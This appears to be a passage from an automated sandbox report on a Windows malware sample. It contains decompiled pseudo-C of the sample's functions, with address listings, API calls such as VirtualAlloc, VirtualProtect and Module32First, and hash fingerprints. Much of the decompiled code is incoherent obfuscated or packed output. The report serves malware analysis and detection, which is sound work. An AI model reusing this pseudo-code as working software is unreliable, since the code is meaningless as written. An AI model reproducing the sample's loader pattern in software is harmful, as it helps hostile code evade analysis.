                                                                                                                                    					E004014CF(_t11, _t17, 0x63, _t21, __edi, __esi); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t17(0xffffffff, 0); // executed
                                                                                                                                    				_push(0x18bd);
                                                                                                                                    				_t13 =  *_t29;
                                                                                                                                    				return L004011BF(_t13, _t22, _t24, _t27, _t34);
                                                                                                                                    			}











                                                                                                                                    0x004018a6
                                                                                                                                    0x004018a6
                                                                                                                                    0x004018a6
                                                                                                                                    0x004018ad
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bd
                                                                                                                                    0x004018c5
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d8
                                                                                                                                    0x004018da
                                                                                                                                    0x004018dc
                                                                                                                                    0x004018df
                                                                                                                                    0x004018e2
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018f6
                                                                                                                                    0x004018fb
                                                                                                                                    0x00401924

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018C5
                                                                                                                                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 417527130-0
                                                                                                                                    • Opcode ID: 2873ec6c5a14247843905e31c4b0b3868c49a6aa804f4dd152b7ea4872c72180
                                                                                                                                    • Instruction ID: 202d679f9ec56a319523a7389e1cb688250d9d9e570aac88d51226151daca0e3
                                                                                                                                    • Opcode Fuzzy Hash: 2873ec6c5a14247843905e31c4b0b3868c49a6aa804f4dd152b7ea4872c72180
                                                                                                                                    • Instruction Fuzzy Hash: 22F06876204204FBDB016AD58CD1EAE3366DB45314F244137B613791E1D63D8B12B76B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __putw.LIBCMTD ref: 00418364
                                                                                                                                      • Part of subcall function 0042F1B0: __errno.LIBCMTD ref: 0042F225
                                                                                                                                      • Part of subcall function 0042F1B0: __invalid_parameter.LIBCMTD ref: 0042F243
                                                                                                                                      • Part of subcall function 00418AE0: _abort.LIBCMTD ref: 00418B49
                                                                                                                                    • _memset.LIBCMT ref: 0041856C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno__invalid_parameter__putw_abort_memset
                                                                                                                                    • String ID: jjj$jjj$jjjj$jjjj$jjjj$jjjj$u!j$v<$\H$`?$`?
                                                                                                                                    • API String ID: 1942346954-237119583
                                                                                                                                    • Opcode ID: 65fe7c806f232d253e7964e6259cb7f45db93805758a9c0b028cf7024829dabe
                                                                                                                                    • Instruction ID: bbfe80e562a95304392bb45b445a9bca0669809f7def545aac120af89fb7fc6f
                                                                                                                                    • Opcode Fuzzy Hash: 65fe7c806f232d253e7964e6259cb7f45db93805758a9c0b028cf7024829dabe
                                                                                                                                    • Instruction Fuzzy Hash: 8312EE71A84215BBE754ABE0DE4AFAE7B74FB08B42F104129F309B91F0DAB415408B6D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$CheckMemory__heap_alloc_base
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4254127243-0
                                                                                                                                    • Opcode ID: 9b9236441cf0b8fceca1a2c28f44137038f3e6ce93a4eb34d50f7cc38c060644
                                                                                                                                    • Instruction ID: 41538179298042e35684228d91def985c7c2290ce95505a8b354278872a1ee14
                                                                                                                                    • Opcode Fuzzy Hash: 9b9236441cf0b8fceca1a2c28f44137038f3e6ce93a4eb34d50f7cc38c060644
                                                                                                                                    • Instruction Fuzzy Hash: D7B16FB1A00204EFDB14CF54D995BEA77F1FB48304F20826AE9156B391D379AD90CFA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Qa
                                                                                                                                    • API String ID: 0-3901847582
                                                                                                                                    • Opcode ID: 370317995ec2dff89957e0c657009e2ba573b5e8bc7abdf8e057830b77d86ab8
                                                                                                                                    • Instruction ID: c33759237269e1fca94575ef7c4f947a98783ded9113130bc61e1173070db44d
                                                                                                                                    • Opcode Fuzzy Hash: 370317995ec2dff89957e0c657009e2ba573b5e8bc7abdf8e057830b77d86ab8
                                                                                                                                    • Instruction Fuzzy Hash: B101D6F160220AEFDB14DF55D844FEB73A4AB48304F10855AF90987284E73CEAA7DB56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 394987441-0
                                                                                                                                    • Opcode ID: 847ff5a3e718e9a4b0a78f5efb8aadb9ef95ab767603f48fb40c6e37dd066d7a
                                                                                                                                    • Instruction ID: 8d3471eafe8835ee1c8773e02ed7ef17068d6816fa5f375bb0d5963605cba335
                                                                                                                                    • Opcode Fuzzy Hash: 847ff5a3e718e9a4b0a78f5efb8aadb9ef95ab767603f48fb40c6e37dd066d7a
                                                                                                                                    • Instruction Fuzzy Hash: 240128B1A00108EFCB04DFA8D985ADE33B9EB88314F10C65AF9198B290D734EE51CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • ___security_init_cookie.LIBCMTD ref: 00418CA5
                                                                                                                                    • ___tmainCRTStartup.LIBCMTD ref: 00418CAA
                                                                                                                                      • Part of subcall function 00418CC0: _check_managed_app.LIBCMTD ref: 00418D1D
                                                                                                                                      • Part of subcall function 00418CC0: __heap_init.LIBCMTD ref: 00418D25
                                                                                                                                      • Part of subcall function 00418CC0: _fast_error_exit.LIBCMTD ref: 00418D30
                                                                                                                                      • Part of subcall function 00418CC0: __mtinit.LIBCMTD ref: 00418D38
                                                                                                                                      • Part of subcall function 00418CC0: _fast_error_exit.LIBCMTD ref: 00418D43
                                                                                                                                      • Part of subcall function 00418CC0: __RTC_Initialize.LIBCMTD ref: 00418D55
                                                                                                                                      • Part of subcall function 00418CC0: __ioinit.LIBCMTD ref: 00418D61
                                                                                                                                      • Part of subcall function 00418CC0: ___crtGetEnvironmentStringsW.LIBCMTD ref: 00418D7F
                                                                                                                                      • Part of subcall function 00418CC0: ___wsetargv.LIBCMTD ref: 00418D89
                                                                                                                                      • Part of subcall function 00418CC0: __wsetenvp.LIBCMTD ref: 00418D9C
                                                                                                                                      • Part of subcall function 00418CC0: __cinit.LIBCMTD ref: 00418DB1
                                                                                                                                      • Part of subcall function 00418CC0: __wwincmdln.LIBCMTD ref: 00418DCE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _fast_error_exit$EnvironmentInitializeStartupStrings___crt___security_init_cookie___tmain___wsetargv__cinit__heap_init__ioinit__mtinit__wsetenvp__wwincmdln_check_managed_app
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3887909383-0
                                                                                                                                    • Opcode ID: cd3a7f06abb22330ecb677000d10ca525c99775dfb4ef4cbec5555c5ccb8c32e
                                                                                                                                    • Instruction ID: d14779e2bfa4b655208d67e8ca308a61278b2062ed2b93799b7abc8a5b7318f4
                                                                                                                                    • Opcode Fuzzy Hash: cd3a7f06abb22330ecb677000d10ca525c99775dfb4ef4cbec5555c5ccb8c32e
                                                                                                                                    • Instruction Fuzzy Hash: 1EA0223208028C020A0033E3300388A320C0CC032C380003FF00C032032E0CACC080FE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0081AFB9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427703857.0000000000816000.00000040.00000001.sdmp, Offset: 00816000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FirstModule32
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3757679902-0
                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                    • Instruction ID: d3dd727673db72922027bc38f258f2a7085526501f778f4be75085783363a389
                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                    • Instruction Fuzzy Hash: DFF0C2721013146FD7242AB9E88CBAAB6ECFF48320F100128E642D10C0DB70E8864662
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • VirtualProtect.KERNELBASE(004B6D84,004BA784,00000040,?), ref: 004180ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: 974f0182f36fae0130d04bd8719ffb4cb418ce75eaf8138526db9a57f92dd9f2
                                                                                                                                    • Instruction ID: c11df730057445d1e37bdc56fe05d896f58abc429dde4dc12fb12d1994443217
                                                                                                                                    • Opcode Fuzzy Hash: 974f0182f36fae0130d04bd8719ffb4cb418ce75eaf8138526db9a57f92dd9f2
                                                                                                                                    • Instruction Fuzzy Hash: A501E8B11563449AD300CF67FD86B593BA8FB19B00B90612DE9C4972F2D7B525018B1E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • RtlEncodePointer.NTDLL(00000000,?,00420FFE), ref: 00418F87
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EncodePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2118026453-0
                                                                                                                                    • Opcode ID: f48d723115d5cc3a86c1b61a3e1e7ce5d0a3c77581f181bcb01f425ab8a3b3b3
                                                                                                                                    • Instruction ID: a85be009532e0f9f2552ed285ef84f095175ae779807d918d475cdc5975e574a
                                                                                                                                    • Opcode Fuzzy Hash: f48d723115d5cc3a86c1b61a3e1e7ce5d0a3c77581f181bcb01f425ab8a3b3b3
                                                                                                                                    • Instruction Fuzzy Hash: B6A01132088208A3C2002282AA0AB023A0CE3C0BA2F0800A0F20CA20A00AA2A80080AA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0081AC81
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427703857.0000000000816000.00000040.00000001.sdmp, Offset: 00816000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                    • Instruction ID: 8f76099b0056bcd462e66abf10f2f925ef7bf4a0c08ae74f93abd2113fbb6158
                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                    • Instruction Fuzzy Hash: B9112B79A00208EFDB01DF98C985E99BBF5EF08751F058094F9489B362D771EA90DF81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,004BA784,004187B0), ref: 00418108
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427162533.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                    • Opcode ID: b9a930ebdd9ac1d8ca6c8d6c7bb0bdeef271628920e3fd060269c94e7f82acf7
                                                                                                                                    • Instruction ID: 3ff3e600a0cc0fe486703aa6386ae0d81b48b17b5da473be9ef94feed30ed30d
                                                                                                                                    • Opcode Fuzzy Hash: b9a930ebdd9ac1d8ca6c8d6c7bb0bdeef271628920e3fd060269c94e7f82acf7
                                                                                                                                    • Instruction Fuzzy Hash: FBB012B12053009FDB008F60EE08B103778E304302F000131F508D1170CB744440DB1A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                    			E0040151C() {
                                                                                                                                    				void* _t23;
                                                                                                                                    				signed int _t24;
                                                                                                                                    				signed int _t25;
                                                                                                                                    				signed int _t26;
                                                                                                                                    				signed int _t30;
                                                                                                                                    				signed int _t32;
                                                                                                                                    				signed char _t33;
                                                                                                                                    				signed int _t34;
                                                                                                                                    				signed int _t35;
                                                                                                                                    				signed char _t36;
                                                                                                                                    				signed int _t37;
                                                                                                                                    				signed int _t38;
                                                                                                                                    				signed int _t40;
                                                                                                                                    				unsigned char* _t42;
                                                                                                                                    				void* _t43;
                                                                                                                                    				void* _t44;
                                                                                                                                    				signed int _t45;
                                                                                                                                    				signed int _t49;
                                                                                                                                    				signed int _t57;
                                                                                                                                    				signed int _t59;
                                                                                                                                    				void* _t62;
                                                                                                                                    
                                                                                                                                    				_t24 = _t23 - _t35;
                                                                                                                                    				asm("outsb");
                                                                                                                                    				asm("out 0xd4, eax");
                                                                                                                                    				if(_t24 < 0) {
                                                                                                                                    					asm("scasb");
                                                                                                                                    					L10:
                                                                                                                                    					asm("aam 0x78");
                                                                                                                                    					asm("scasb");
                                                                                                                                    					L16:
                                                                                                                                    					_t25 =  *0xeaaa3b66;
                                                                                                                                    					_t44 = _t43 -  *_t30;
                                                                                                                                    					_t33 = _t33 -  *_t30;
                                                                                                                                    					 *0x23a22f53 = _t25;
                                                                                                                                    					asm("cmpsb");
                                                                                                                                    					_pop(_t42);
                                                                                                                                    					_t45 = _t44 -  *_t30;
                                                                                                                                    					_t57 = _t45;
                                                                                                                                    					L18:
                                                                                                                                    					_t49 = _t49 -  *_t30;
                                                                                                                                    					_t34 = _t33 + 1;
                                                                                                                                    					_t40 =  *(_t30 + 0x7c) * 0x41;
                                                                                                                                    					_t26 = _t25 & 0x5f78d47d;
                                                                                                                                    					asm("scasb");
                                                                                                                                    					L19:
                                                                                                                                    					__eflags = _t24;
                                                                                                                                    					L24:
                                                                                                                                    					if(_t57 < 0) {
                                                                                                                                    						while(1) {
                                                                                                                                    							 *_t42 =  *_t42 >> 0x44;
                                                                                                                                    							asm("outsb");
                                                                                                                                    							asm("rcr dh, 0x8a");
                                                                                                                                    							 *_t26 =  *_t26 << 0x40;
                                                                                                                                    							_t26 = _t26 & 0x00000090;
                                                                                                                                    							 *0x322ec0fb = _t26;
                                                                                                                                    							_t36 = _t35 -  *0x67;
                                                                                                                                    							 *_t42 =  *_t42 >> 0xef;
                                                                                                                                    							__eflags =  *_t42;
                                                                                                                                    							asm("out dx, eax");
                                                                                                                                    							asm("std");
                                                                                                                                    							_t37 = _t36 & _t26;
                                                                                                                                    							_t45 = 0xc057d3c0 &  *_t37;
                                                                                                                                    							_t35 = _t37 & _t49;
                                                                                                                                    							_t32 = 0x00000067 &  *_t35;
                                                                                                                                    							asm("rcr dh, 0xcc");
                                                                                                                                    							 *(_t40 + _t40 * 2) =  *(_t40 + _t40 * 2) << 0x37;
                                                                                                                                    							asm("stosb");
                                                                                                                                    							asm("outsd");
                                                                                                                                    							asm("sbb al, [ebp-0x6f]");
                                                                                                                                    							_t30 = _t32 - 1;
                                                                                                                                    							 *_t30 =  *_t30 | 0xc057d3c0;
                                                                                                                                    							__eflags =  *_t30;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					if (_t57 != 0) goto L32;
                                                                                                                                    					L26:
                                                                                                                                    					_t34 = _t34 + 1;
                                                                                                                                    				}
                                                                                                                                    				asm("scasb");
                                                                                                                                    				asm("cmpsb");
                                                                                                                                    				_pop(_t42);
                                                                                                                                    				asm("repe inc ecx");
                                                                                                                                    				_t40 = _t38 ^  *(_t43 - 0x2c);
                                                                                                                                    				if(_t40 < 0) {
                                                                                                                                    					 *0x6ea6d356 = _t24;
                                                                                                                                    				} else {
                                                                                                                                    					asm("in al, dx");
                                                                                                                                    					_t24 = _t24 - 0x2b2b2b33;
                                                                                                                                    					 *0xfb66a6d9 = _t24;
                                                                                                                                    					asm("cmpsb");
                                                                                                                                    					asm("outsb");
                                                                                                                                    					[tword [edx+0x79] = _t62;
                                                                                                                                    					_t33 = _t33 + 1;
                                                                                                                                    					_t40 =  *(_t30 - 0x2c) * 0x78;
                                                                                                                                    					_pop(_t30);
                                                                                                                                    					asm("scasb");
                                                                                                                                    				}
                                                                                                                                    				_t42[0x53a29b6e] = _t42[0x53a29b6e] << _t33;
                                                                                                                                    				asm("das");
                                                                                                                                    				asm("in al, dx");
                                                                                                                                    				_t45 = _t43 -  *_t30;
                                                                                                                                    				if(_t45 != 0) {
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						_pop(_t42);
                                                                                                                                    						asm("wait");
                                                                                                                                    						L21:
                                                                                                                                    						asm("movsb");
                                                                                                                                    						asm("outsb");
                                                                                                                                    						asm("jecxz 0xffffffa8");
                                                                                                                                    						asm("outsb");
                                                                                                                                    						_t26 = _t30;
                                                                                                                                    						_t30 = _t24;
                                                                                                                                    						 *0xe366a613 = _t26;
                                                                                                                                    						_t34 = _t33 + 1;
                                                                                                                                    						__eflags = _t34;
                                                                                                                                    						asm("das");
                                                                                                                                    						if(_t34 < 0) {
                                                                                                                                    							L30:
                                                                                                                                    							 *_t35 = _t26;
                                                                                                                                    							asm("das");
                                                                                                                                    							if(_t59 != 0) {
                                                                                                                                    								goto L26;
                                                                                                                                    							}
                                                                                                                                    							 *(_t40 + 0x3db9c5aa) =  *(_t40 + 0x3db9c5aa) & _t49;
                                                                                                                                    							asm("stosb");
                                                                                                                                    							asm("lds edi, [ecx-0x3fd4d4c3]");
                                                                                                                                    							 *[cs:0xa3a7dec0] = _t26;
                                                                                                                                    							 *_t42 =  *_t42 >> 0xa3;
                                                                                                                                    							 *[cs:0x23d422b2] = _t26;
                                                                                                                                    							asm("stosb");
                                                                                                                                    							asm("in eax, dx");
                                                                                                                                    							asm("adc [eax+0x2b], bh");
                                                                                                                                    							_t26 = 0;
                                                                                                                                    							asm("loopne 0x34");
                                                                                                                                    							_t34 = _t34 -  *_t30;
                                                                                                                                    							_t45 = _t45 -  *_t30 -  *_t30;
                                                                                                                                    							_t42 = _t34;
                                                                                                                                    							_t26 = _t26 - _t30 - 0x88602f5f;
                                                                                                                                    							_t59 = _t26;
                                                                                                                                    							goto L30;
                                                                                                                                    						}
                                                                                                                                    						_t30 = _t30 -  *((intOrPtr*)(_t35 + 0x7c));
                                                                                                                                    						__eflags = _t30;
                                                                                                                                    						goto L24;
                                                                                                                                    					}
                                                                                                                                    					if(__eflags < 0) {
                                                                                                                                    						goto L21;
                                                                                                                                    					}
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						asm("cmpsb");
                                                                                                                                    						asm("outsb");
                                                                                                                                    						asm("wait");
                                                                                                                                    						goto L16;
                                                                                                                                    					}
                                                                                                                                    					asm("aam 0xd4");
                                                                                                                                    					asm("sbb eax, 0xae5378d4");
                                                                                                                                    					goto L19;
                                                                                                                                    				}
                                                                                                                                    				_t49 = _t49 - _t42[0x437c875e];
                                                                                                                                    				 *(_t30 + 0x2b + _t24 * 2) = _t40;
                                                                                                                                    				_t45 = _t45 -  *_t30;
                                                                                                                                    				_t25 = _t24 &  *(_t33 + 0x2f);
                                                                                                                                    				if(_t25 != 0) {
                                                                                                                                    					goto L18;
                                                                                                                                    				}
                                                                                                                                    				_t33 = _t33 + 1;
                                                                                                                                    				goto L10;
                                                                                                                                    			}
























                                                                                                                                    0x0040151c
                                                                                                                                    0x0040151e
                                                                                                                                    0x0040151f
                                                                                                                                    0x00401521
                                                                                                                                    0x00401586
                                                                                                                                    0x004015ad
                                                                                                                                    0x004015ad
                                                                                                                                    0x004015b0
                                                                                                                                    0x00401611
                                                                                                                                    0x00401611
                                                                                                                                    0x00401616
                                                                                                                                    0x00401618
                                                                                                                                    0x0040161a
                                                                                                                                    0x0040161f
                                                                                                                                    0x00401620
                                                                                                                                    0x00401624
                                                                                                                                    0x00401624
                                                                                                                                    0x00401626
                                                                                                                                    0x00401626
                                                                                                                                    0x00401628
                                                                                                                                    0x00401629
                                                                                                                                    0x0040162d
                                                                                                                                    0x00401632
                                                                                                                                    0x00401634
                                                                                                                                    0x00401634
                                                                                                                                    0x00401659
                                                                                                                                    0x00401659
                                                                                                                                    0x004016d7
                                                                                                                                    0x004016d9
                                                                                                                                    0x004016dc
                                                                                                                                    0x004016dd
                                                                                                                                    0x004016e0
                                                                                                                                    0x004016e5
                                                                                                                                    0x004016e7
                                                                                                                                    0x004016f1
                                                                                                                                    0x004016f6
                                                                                                                                    0x004016f6
                                                                                                                                    0x004016f8
                                                                                                                                    0x004016f9
                                                                                                                                    0x004016fa
                                                                                                                                    0x004016fc
                                                                                                                                    0x00401703
                                                                                                                                    0x00401705
                                                                                                                                    0x004016c9
                                                                                                                                    0x004016cc
                                                                                                                                    0x004016d0
                                                                                                                                    0x004016d1
                                                                                                                                    0x004016d2
                                                                                                                                    0x004016d5
                                                                                                                                    0x004016d6
                                                                                                                                    0x004016d6
                                                                                                                                    0x004016d6
                                                                                                                                    0x004016d7
                                                                                                                                    0x0040165b
                                                                                                                                    0x0040165c
                                                                                                                                    0x0040165c
                                                                                                                                    0x0040165c
                                                                                                                                    0x00401523
                                                                                                                                    0x0040154a
                                                                                                                                    0x0040154b
                                                                                                                                    0x0040154c
                                                                                                                                    0x0040154e
                                                                                                                                    0x00401551
                                                                                                                                    0x0040158e
                                                                                                                                    0x00401553
                                                                                                                                    0x00401553
                                                                                                                                    0x00401554
                                                                                                                                    0x00401559
                                                                                                                                    0x0040155e
                                                                                                                                    0x0040155f
                                                                                                                                    0x00401560
                                                                                                                                    0x00401563
                                                                                                                                    0x00401564
                                                                                                                                    0x00401568
                                                                                                                                    0x00401569
                                                                                                                                    0x00401569
                                                                                                                                    0x00401590
                                                                                                                                    0x00401596
                                                                                                                                    0x00401597
                                                                                                                                    0x00401598
                                                                                                                                    0x0040159a
                                                                                                                                    0x004015c7
                                                                                                                                    0x00401645
                                                                                                                                    0x00401646
                                                                                                                                    0x00401647
                                                                                                                                    0x00401647
                                                                                                                                    0x00401648
                                                                                                                                    0x00401649
                                                                                                                                    0x0040164b
                                                                                                                                    0x0040164c
                                                                                                                                    0x0040164c
                                                                                                                                    0x0040164d
                                                                                                                                    0x00401652
                                                                                                                                    0x00401652
                                                                                                                                    0x00401653
                                                                                                                                    0x00401654
                                                                                                                                    0x00401697
                                                                                                                                    0x00401697
                                                                                                                                    0x00401699
                                                                                                                                    0x0040169a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040169c
                                                                                                                                    0x0040169e
                                                                                                                                    0x0040169f
                                                                                                                                    0x004016a5
                                                                                                                                    0x004016ab
                                                                                                                                    0x004016ac
                                                                                                                                    0x004016b2
                                                                                                                                    0x004016b3
                                                                                                                                    0x004016b4
                                                                                                                                    0x004016b9
                                                                                                                                    0x004016bb
                                                                                                                                    0x0040168a
                                                                                                                                    0x00401690
                                                                                                                                    0x00401692
                                                                                                                                    0x00401693
                                                                                                                                    0x00401693
                                                                                                                                    0x00000000
                                                                                                                                    0x00401693
                                                                                                                                    0x00401656
                                                                                                                                    0x00401656
                                                                                                                                    0x00000000
                                                                                                                                    0x00401656
                                                                                                                                    0x004015c9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004015cb
                                                                                                                                    0x0040160e
                                                                                                                                    0x0040160f
                                                                                                                                    0x00401610
                                                                                                                                    0x00000000
                                                                                                                                    0x00401610
                                                                                                                                    0x004015cd
                                                                                                                                    0x004015cf
                                                                                                                                    0x00000000
                                                                                                                                    0x004015cf
                                                                                                                                    0x0040159c
                                                                                                                                    0x0040159f
                                                                                                                                    0x004015a3
                                                                                                                                    0x004015a5
                                                                                                                                    0x004015a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004015aa
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: +
                                                                                                                                    • API String ID: 0-2126386893
                                                                                                                                    • Opcode ID: 46998fc728ac9a0f35bedc90094dc9bbe049a35e5da0e159e8c81506cee840eb
                                                                                                                                    • Instruction ID: 1720c53bfe387498726e4fe8e560c9a44727930be4464582c2a99f42b0796436
                                                                                                                                    • Opcode Fuzzy Hash: 46998fc728ac9a0f35bedc90094dc9bbe049a35e5da0e159e8c81506cee840eb
                                                                                                                                    • Instruction Fuzzy Hash: 54314C320542A6CFCB157E7C4A481907FB0E9567103284BBFC4916F1BBCA366112CB4B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                    			E004021AC(intOrPtr* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* _a61) {
                                                                                                                                    				void* _t15;
                                                                                                                                    				void* _t18;
                                                                                                                                    				void* _t34;
                                                                                                                                    				void* _t35;
                                                                                                                                    				void* _t37;
                                                                                                                                    				void* _t42;
                                                                                                                                    				void* _t54;
                                                                                                                                    				void* _t55;
                                                                                                                                    				void* _t65;
                                                                                                                                    
                                                                                                                                    				_t42 = __edx;
                                                                                                                                    				_t54 = _t65;
                                                                                                                                    				_push(__ebx);
                                                                                                                                    				_push(__esi);
                                                                                                                                    				_push(__edi);
                                                                                                                                    				_t15 = 0x21de;
                                                                                                                                    				_t34 = 0x8a;
                                                                                                                                    				L004011BF(_t15, __edi, __esi, _t54, __eflags);
                                                                                                                                    				asm("in al, dx");
                                                                                                                                    				asm("outsb");
                                                                                                                                    				asm("xlatb");
                                                                                                                                    				_t35 = _t34 -  *__ebx;
                                                                                                                                    				_t55 = _t54 -  *__ebx;
                                                                                                                                    				asm("cmpsb");
                                                                                                                                    				asm("fucomi st0, st4");
                                                                                                                                    				_t18 =  *0xd41a2376 - 0x2b2b2b23;
                                                                                                                                    				if (_t18 < 0) goto L10;
                                                                                                                                    				_t37 = _t35 + 1;
                                                                                                                                    			}












                                                                                                                                    0x004021ac
                                                                                                                                    0x004021ad
                                                                                                                                    0x004021b2
                                                                                                                                    0x004021b3
                                                                                                                                    0x004021b4
                                                                                                                                    0x004021bf
                                                                                                                                    0x004021d1
                                                                                                                                    0x004021d9
                                                                                                                                    0x004021de
                                                                                                                                    0x004021df
                                                                                                                                    0x004021e0
                                                                                                                                    0x004021e1
                                                                                                                                    0x004021e3
                                                                                                                                    0x004021ea
                                                                                                                                    0x004021ec
                                                                                                                                    0x004021ee
                                                                                                                                    0x004021f3
                                                                                                                                    0x004021f4

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3f078a61e7d8bdff5fb460f7f9e224d8358be5166a1aa216f1a1dce528252d95
                                                                                                                                    • Instruction ID: 96491e59497c7db7dc3805055ef7c2b81fd006f376b4310a1b0e8a8bb8e46cda
                                                                                                                                    • Opcode Fuzzy Hash: 3f078a61e7d8bdff5fb460f7f9e224d8358be5166a1aa216f1a1dce528252d95
                                                                                                                                    • Instruction Fuzzy Hash: 7C3104710083A5CECB10BEBC8B9DAA53F24FB0230472403AAC6921E1CED9742553CB87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                    			E00401FB5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                                                    				void* _t55;
                                                                                                                                    
